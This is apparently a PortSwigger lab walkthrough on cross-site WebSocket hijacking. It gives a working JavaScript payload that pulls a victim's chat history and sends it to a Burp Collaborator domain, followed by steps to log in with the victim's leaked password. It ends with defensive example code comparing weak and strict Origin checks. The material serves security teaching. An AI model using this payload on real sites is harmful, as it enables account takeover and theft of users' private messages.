This online shop has a live chat feature implemented using WebSockets.
To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this to gain access to their account.
Note
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (burpcollaborator.net).
In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request is authenticated only by the session cookie and carries no CSRF token, so any page the victim visits can trigger the same handshake and the browser will attach the cookie.
Right-click on the handshake request and select "Copy URL".
In your browser, go to the exploit server and paste the following template into the "Body" section:
<script>
// Open a WebSocket to the target from the exploit server's origin. The browser
// attaches the victim's session cookie to the handshake; nothing server-side
// (no Origin check, no CSRF token) stops the cross-site connection.
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
    // Same command the legitimate chat client sends to load past messages.
    websocket.send("READY");
}
function handleReply(event) {
    // Forward every message the server replays to Collaborator. mode 'no-cors'
    // lets the request leave even though the response can't be read.
    fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
Replace your-websocket-URL with the URL from the WebSocket handshake, and your-collaborator-domain with a payload generated by Burp Collaborator client. Ensure you change the protocol in the WebSocket handshake URL from https:// to wss://, since the copied URL is the HTTP form of the upgrade request.
Click "View exploit".
Poll for interactions using Burp Collaborator client. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. You should also see that another user has visited your exploit page, and that their chat history contains their password.
Log in to the victim user's account.
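The handshake above succeeds because the server accepts any upgrade request that carries a valid session cookie and never looks at where the request came from. The following is an added example, not code from the lab or from PortSwigger: it models that server-side decision, shows a substring Origin check that is still bypassable, and shows the exact-match allowlist a practitioner would deploy instead. All host names, the /chat path and the cookie value are constructed for illustration.

```javascript
// Added example, not part of the lab or its code. Models the server side of the
// WebSocket handshake the lab abuses. Host names, paths and cookie values are
// constructed for illustration.

// Parse the head of a raw HTTP/1.1 upgrade request into a request line and a
// map of lower-cased header names to values.
function parseHandshake(raw) {
  const head = raw.split('\r\n\r\n')[0];
  const lines = head.split('\r\n');
  const headers = {};
  for (const line of lines.slice(1)) {
    const sep = line.indexOf(':');
    if (sep === -1) continue;
    headers[line.slice(0, sep).trim().toLowerCase()] = line.slice(sep + 1).trim();
  }
  return { requestLine: lines[0], headers };
}

// What the lab's server effectively does: accept the handshake as long as it is
// a WebSocket upgrade and a session cookie is present. Origin is never
// consulted, so the exploit-server page gets through with the victim's cookie.
function acceptsHandshakeVulnerable(headers) {
  return (headers['upgrade'] || '').toLowerCase() === 'websocket' &&
         /(^|;\s*)session=/.test(headers['cookie'] || '');
}

// A common but broken fix: substring match on the Origin header. An attacker
// origin that contains the expected host, such as
// https://shop.example.attacker.example, still passes.
function originAllowedWeak(headers, expectedHost) {
  const origin = headers['origin'];
  return typeof origin === 'string' && origin.includes(expectedHost);
}

// The check to deploy: exact comparison of scheme://host[:port] against an
// allowlist. A missing Origin and the literal "null" origin are rejected too,
// because the cookie the browser attaches automatically is what the attack uses.
function originAllowedStrict(headers, allowedOrigins) {
  const origin = headers['origin'];
  if (typeof origin !== 'string' || origin === 'null') return false;
  let parsed;
  try { parsed = new URL(origin); } catch (e) { return false; }
  // URL.origin lower-cases the host and drops the default port, so
  // 'HTTPS://Shop.Example:443' compares equal to 'https://shop.example'.
  return allowedOrigins.includes(parsed.origin);
}

// Hardened acceptance: upgrade + session cookie + strict Origin allowlist.
function acceptsHandshakeHardened(headers, allowedOrigins) {
  return acceptsHandshakeVulnerable(headers) && originAllowedStrict(headers, allowedOrigins);
}

// Constructed handshakes: the shop's own chat page, the lab's exploit-server
// page (same cookie, attacker Origin), a look-alike origin that defeats
// substring checks, and a request with no Origin header at all.
function buildHandshake(origin) {
  const lines = [
    'GET /chat HTTP/1.1',
    'Host: shop.example',
    'Upgrade: websocket',
    'Connection: Upgrade',
    'Sec-WebSocket-Version: 13',
    'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==',
    'Cookie: session=constructed-victim-session-token',
  ];
  if (origin !== undefined) lines.push('Origin: ' + origin);
  lines.push('', '');
  return lines.join('\r\n');
}

const ALLOWED    = ['https://shop.example'];
const SAME_SITE  = parseHandshake(buildHandshake('https://shop.example')).headers;
const CROSS_SITE = parseHandshake(buildHandshake('https://exploit-server.example')).headers;
const LOOK_ALIKE = parseHandshake(buildHandshake('https://shop.example.attacker.example')).headers;
const NO_ORIGIN  = parseHandshake(buildHandshake(undefined)).headers;

// One object summarising the four outcomes; every value should be true.
function summary() {
  return {
    vulnerableAcceptsCrossSite: acceptsHandshakeVulnerable(CROSS_SITE),
    weakCheckAcceptsLookAlike: originAllowedWeak(LOOK_ALIKE, 'shop.example'),
    hardenedAcceptsSameSite: acceptsHandshakeHardened(SAME_SITE, ALLOWED),
    hardenedRejectsCrossSite: !acceptsHandshakeHardened(CROSS_SITE, ALLOWED),
    hardenedRejectsLookAlike: !acceptsHandshakeHardened(LOOK_ALIKE, ALLOWED),
    hardenedRejectsNoOrigin: !acceptsHandshakeHardened(NO_ORIGIN, ALLOWED),
  };
}

console.log(summary());
```

Rejecting a missing Origin is a deliberate choice here: browsers always send it on a WebSocket handshake, so its absence means a non-browser client, and those should authenticate with something other than an ambient cookie. An equally sound fix, independent of Origin, is to require a per-session token in the handshake URL or a custom header, which is exactly what the lab's handshake lacks.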